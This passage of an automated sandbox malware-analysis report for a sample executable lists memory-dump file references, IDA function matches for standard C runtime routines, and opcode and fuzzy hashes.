          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: FindHandlersScopeSectionTableValidate
          • String ID:
          • API String ID: 876702719-0
          • Opcode ID: b1f007dde887acc725995a8bacf750f679cadae1ffe26ed1d54dc4f4b23db847
          • Instruction ID: e26e143b0c905dcf6395fb32c51b25e9a8c01aba829328eb8dfa9b7b6e0fa7be
          • Opcode Fuzzy Hash: b1f007dde887acc725995a8bacf750f679cadae1ffe26ed1d54dc4f4b23db847
          • Instruction Fuzzy Hash: F791B136A00605CBCB54CF58D8446ADB7F5FB84710F158329E895D73E1EB39EC16CA92
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: _parse_cmdline
          • String ID: @$q$C:\Users\user\Desktop\vk2wTOx91s.exe
          • API String ID: 439573244-648640433
          • Opcode ID: 946a5b4bb00e147c92b16e7c9cc163cd79a488b86947ea21c061b1e70194a95b
          • Instruction ID: 8702dceea8a34a5a76535e019778507b6b9d0e1008fddd20fbdb311c74e3eb2d
          • Opcode Fuzzy Hash: 946a5b4bb00e147c92b16e7c9cc163cd79a488b86947ea21c061b1e70194a95b
          • Instruction Fuzzy Hash: 7D21D5B1D00148EFCB10DBA9AC808DE7BEDEA403247A08775E514E32D1E3385E56CB94
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: AdjustPointer
          • String ID:
          • API String ID: 1740715915-0
          • Opcode ID: d4e7f8dd14cec7ae38711e434d60df92497942b6d862d19a981a76ff80f3236a
          • Instruction ID: 06d67b8e53e139b34b3c552a019441cb145257aed4aefb96faa899aee4590109
          • Opcode Fuzzy Hash: d4e7f8dd14cec7ae38711e434d60df92497942b6d862d19a981a76ff80f3236a
          • Instruction Fuzzy Hash: A151E076A44606AFDB298F10D841BFE77E6EF40321F1C452DE80587292EB31ED80C790
          APIs
          • TlsGetValue.KERNEL32(00000000,?,006FEDD9,00000000,00705E6A,007126B8,00000000,00000314,?,007039E1,007126B8,Microsoft Visual C++ Runtime Library,00012010), ref: 006FED72
          • TlsGetValue.KERNEL32(00000001,?,006FEDD9,00000000,00705E6A,007126B8,00000000,00000314,?,007039E1,007126B8,Microsoft Visual C++ Runtime Library,00012010), ref: 006FED89
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: Value
          • String ID: EncodePointer$KERNEL32.DLL
          • API String ID: 3702945584-3682587211
          • Opcode ID: 6e6e4c09d37f206f62c141208aa91c8c4f0369e08a50150cc0c16a81bed14158
          • Instruction ID: d845c0c055b451ef7e543bfa82aee399e217df501ec2c1c04b4169eba2f6000d
          • Opcode Fuzzy Hash: 6e6e4c09d37f206f62c141208aa91c8c4f0369e08a50150cc0c16a81bed14158
          • Instruction Fuzzy Hash: 11F0447020121AFADB11A739DC509FB3F9E9F003A47144231FA18D6AB2EF26CD4186A4
          APIs
            • Part of subcall function 007070A4: __getptd.LIBCMT ref: 007070AA
            • Part of subcall function 007070A4: __getptd.LIBCMT ref: 007070BA
          • __getptd.LIBCMT ref: 00707876
            • Part of subcall function 006FF027: __amsg_exit.LIBCMT ref: 006FF037
          • __getptd.LIBCMT ref: 00707884
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: __getptd$__amsg_exit
          • String ID: csm
          • API String ID: 1969926928-1018135373
          • Opcode ID: 1993cce291d80a9215594e339eccf3b7a78138a8c6cb7957884baf4465edb638
          • Instruction ID: 3a8397c190b33ddef655882884208c6809ec370e99f2f128c0a94dc4daa3dfcb
          • Opcode Fuzzy Hash: 1993cce291d80a9215594e339eccf3b7a78138a8c6cb7957884baf4465edb638
          • Instruction Fuzzy Hash: 7D012834C04205DECF389F24D888AADB7F5AF10311F14862DE440566D2DF39AD90CF61